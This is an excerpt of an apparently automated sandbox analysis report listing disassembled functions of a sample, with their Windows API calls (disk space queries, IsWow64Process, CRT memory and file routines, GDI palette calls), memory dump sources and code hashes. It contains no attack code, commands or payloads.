                                                                                  • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0BEA0397
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                  • API String ID: 1646373207-3712701948
                                                                                  • Opcode ID: 4fe5f810d7f5f4a2aff0749bc52099fdf4184f64a6d0c6319de6e1e2c751dca1
                                                                                  • Instruction ID: 0a98aa461d7befe9b21983003ebe047cef0d4f7cc4ad0070cc16007404906101
                                                                                  • Opcode Fuzzy Hash: 4fe5f810d7f5f4a2aff0749bc52099fdf4184f64a6d0c6319de6e1e2c751dca1
                                                                                  • Instruction Fuzzy Hash: F5D05E707203C2DFDB40BBA264C265A27DCC34031BF50382B91004D202D7B09D4C8358
                                                                                  Function 6A6DBF14 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,00000000,?,6A6E1A04,?,?,6A6D184E,?), ref: 6A6DBF26
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 6A6DBF2D
                                                                                  • GetCurrentProcess.KERNEL32(00000000,?,6A6E1A04,?,?,6A6D184E,?), ref: 6A6DBF51
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressCurrentHandleModuleProcProcess
                                                                                  • String ID: IsWow64Process$kernel32
                                                                                  • API String ID: 4190356694-3789238822
                                                                                  • Opcode ID: 90898232cca29c1aa08faadb47f83698130a463a31296ffcbea1d6a3c491f8c5
                                                                                  • Instruction ID: 42a5bf1d8e510fe5f84464e1b2fb997a93cd7e1d6ac6d443baf398bbfa9dc591
                                                                                  • Opcode Fuzzy Hash: 90898232cca29c1aa08faadb47f83698130a463a31296ffcbea1d6a3c491f8c5
                                                                                  • Instruction Fuzzy Hash: 83C01276449560664A5233E48B8958927F848196D231809A4FE42F9114CF545C005971
                                                                                  Function 6A7000FA Relevance: 6.1, APIs: 4, Instructions: 137COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __flush.LIBCMT ref: 6A7001BE
                                                                                  • __fileno.LIBCMT ref: 6A7001DE
                                                                                  • __locking.LIBCMT ref: 6A7001E5
                                                                                  • __flsbuf.LIBCMT ref: 6A700210
                                                                                    • Part of subcall function 6A701068: __getptd_noexit.LIBCMT ref: 6A701068
                                                                                    • Part of subcall function 6A700D34: __decode_pointer.LIBCMT ref: 6A700D3F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                  • String ID:
                                                                                  • API String ID: 3240763771-0
                                                                                  • Opcode ID: 95493f2f965f632cd2afebb89a859025c36bf254d5a3e4afddc1329766e0a83b
                                                                                  • Instruction ID: 3cc547f2f54788e03cc6feb0ea26335312a17b2ce45557c3b9a014d3c574b547
                                                                                  • Opcode Fuzzy Hash: 95493f2f965f632cd2afebb89a859025c36bf254d5a3e4afddc1329766e0a83b
                                                                                  • Instruction Fuzzy Hash: AB41B3B1A00A04AFDB148FA9CA8859EBBF6AF91370F228539D46597141DF70DA4BCB40
                                                                                  Function 6A6FC99E Relevance: 6.1, APIs: 4, Instructions: 131timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6FC9B5
                                                                                    • Part of subcall function 6A6EE27D: __cftof.LIBCMT ref: 6A6EE28E
                                                                                  • GetFileTime.KERNEL32(?,?,?,?), ref: 6A6FC9EC
                                                                                  • GetFileSizeEx.KERNEL32(?,?), ref: 6A6FCA04
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$SizeTime__cftof_memset
                                                                                  • String ID:
                                                                                  • API String ID: 2749391713-0
                                                                                  • Opcode ID: fb36764bf0c965cd68c697bd566196e2aa0114559abfa71b7e6c56281a3e6e5d
                                                                                  • Instruction ID: 610bec02f20e4656e4f6297775beb74fbea51aa80b608b8d9171887ffa83af7f
                                                                                  • Opcode Fuzzy Hash: fb36764bf0c965cd68c697bd566196e2aa0114559abfa71b7e6c56281a3e6e5d
                                                                                  • Instruction Fuzzy Hash: 04512C71904705AFC724CFA8C885D9AB7F9FB09310B058E2EE5A6E3690EB30F545CB64
                                                                                  Function 0BEA237C Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0BEA242B
                                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0BEA2447
                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0BEA24BE
                                                                                  • VariantClear.OLEAUT32(?), ref: 0BEA24E7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                  • String ID:
                                                                                  • API String ID: 920484758-0
                                                                                  • Opcode ID: 33014472c2517b7c2202ae716b1191d877759e0b0b6c6cf28ba03e1954dbec12
                                                                                  • Instruction ID: e8e91b4d1ca6d640bc0d218d3b05b3a54e9b8fa32c1efa7cb272bf2cef3fbefd
                                                                                  • Opcode Fuzzy Hash: 33014472c2517b7c2202ae716b1191d877759e0b0b6c6cf28ba03e1954dbec12
                                                                                  • Instruction Fuzzy Hash: 95410879A012299FCB62EF58CC90AC9B7FCAF59204F0051D5E649BB211DA34BF848F64
                                                                                  Function 6A6D7AE0 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D7B0E
                                                                                    • Part of subcall function 6A6DB0A0: _memset.LIBCMT ref: 6A6DB0C8
                                                                                  • _memset.LIBCMT ref: 6A6D7B4C
                                                                                  • _memset.LIBCMT ref: 6A6D7B63
                                                                                  • _memset.LIBCMT ref: 6A6D7B80
                                                                                    • Part of subcall function 6A6D5160: LoadLibraryA.KERNEL32(version.dll,?,?,00000000), ref: 6A6D519C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1275148839-0
                                                                                  • Opcode ID: 45ce029a9ce275096bbbf81f268260d5a6e6547c538bbecd7c3626f5ec450ef6
                                                                                  • Instruction ID: 7d2dff2c9ffab181e35b693605c412ff3ebce46b02fe0ce4dd0cad635bf62e77
                                                                                  • Opcode Fuzzy Hash: 45ce029a9ce275096bbbf81f268260d5a6e6547c538bbecd7c3626f5ec450ef6
                                                                                  • Instruction Fuzzy Hash: 2B31D5B1508285AED324DB60D999FDB77EC9B88348F444829E98887112FE70A60CC7A3
                                                                                  Function 0BE9EAB4 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0BE9EAD0
                                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0BE9EAF4
                                                                                  • GetModuleFileNameA.KERNEL32(500BEFB6), ref: 0BE9EB0F
                                                                                  • LoadStringA.USER32(00000000,0000FFEA,?,00000100), ref: 0BE9EBB3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 3990497365-0
                                                                                  • Opcode ID: 208da545e310afa5677eb2b484c8d75990d6aeeb69b40945b3cc2e0bd7375674
                                                                                  • Instruction ID: c0d535e7ef33f794086b95285b138028f992dbe63bd57225ea702b0b7966c8a9
                                                                                  • Opcode Fuzzy Hash: 208da545e310afa5677eb2b484c8d75990d6aeeb69b40945b3cc2e0bd7375674
                                                                                  • Instruction Fuzzy Hash: 6B41E871A0025CAFDF25DB68D885BDDB7F9AB08204F0450E6AA08E7251E774AF8C8F55
                                                                                  Function 0BE9FC50 Relevance: 6.1, APIs: 4, Instructions: 97threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetStringTypeA.KERNEL32(00000C00,00000002,?,00000080,?), ref: 0BE9FD4A
                                                                                  • GetThreadLocale.KERNEL32 ref: 0BE9FC7A
                                                                                    • Part of subcall function 0BE9FBD8: GetCPInfo.KERNEL32(00000000,?), ref: 0BE9FBF1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoLocaleStringThreadType
                                                                                  • String ID:
                                                                                  • API String ID: 1505017576-0
                                                                                  • Opcode ID: 1cf7841a9ee3c0786d86a2d78dfa068803ff4da13616b2f64f036296fc7e8c94
                                                                                  • Instruction ID: ccaff33b001b6dcd31a529da715b8ecddb8d6241052b8d8f250c9bb1a49cdd13
                                                                                  • Opcode Fuzzy Hash: 1cf7841a9ee3c0786d86a2d78dfa068803ff4da13616b2f64f036296fc7e8c94
                                                                                  • Instruction Fuzzy Hash: 1B316861A01286AEDF00DFB6F8013A93FD5EF81314F849061D844CB281EBB4DA5DC795
                                                                                  Function 6A6E4CC2 Relevance: 6.1, APIs: 4, Instructions: 96COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$select
                                                                                  • String ID:
                                                                                  • API String ID: 538464093-0
                                                                                  • Opcode ID: e063163eea1534e1cc5421e5484ed97fde75f03364e544e88ddb5411cfa37448
                                                                                  • Instruction ID: 8a3dadd2c5aee13a4fe2f0a533c07e5d8f7f647827250db7ca34920a07e225b8
                                                                                  • Opcode Fuzzy Hash: e063163eea1534e1cc5421e5484ed97fde75f03364e544e88ddb5411cfa37448
                                                                                  • Instruction Fuzzy Hash: 0E31C4B150E7809FD320DF64D8C496BB7F5FB85308F11092DF59683601EF35A9498B62
                                                                                  Function 0BEB70DC Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0BEB52E4: RtlEnterCriticalSection.NTDLL(0BEFDB2C), ref: 0BEB52EC
                                                                                    • Part of subcall function 0BEB52E4: RtlLeaveCriticalSection.NTDLL(0BEFDB2C), ref: 0BEB52F9
                                                                                    • Part of subcall function 0BEB52E4: RtlEnterCriticalSection.NTDLL(00000038), ref: 0BEB5302
                                                                                    • Part of subcall function 0BEB8500: GetDC.USER32(00000000), ref: 0BEB8556
                                                                                    • Part of subcall function 0BEB8500: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0BEB856B
                                                                                    • Part of subcall function 0BEB8500: GetDeviceCaps.GDI32(00000000,0000000E), ref: 0BEB8575
                                                                                    • Part of subcall function 0BEB8500: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0BEB712F,00000000,0BEB71BB), ref: 0BEB8599
                                                                                    • Part of subcall function 0BEB8500: ReleaseDC.USER32(00000000,00000000), ref: 0BEB85A4
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 0BEB7131
                                                                                  • SelectObject.GDI32(00000000,?), ref: 0BEB714A
                                                                                  • SelectPalette.GDI32(00000000,?,000000FF), ref: 0BEB7173
                                                                                  • RealizePalette.GDI32(00000000), ref: 0BEB717F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
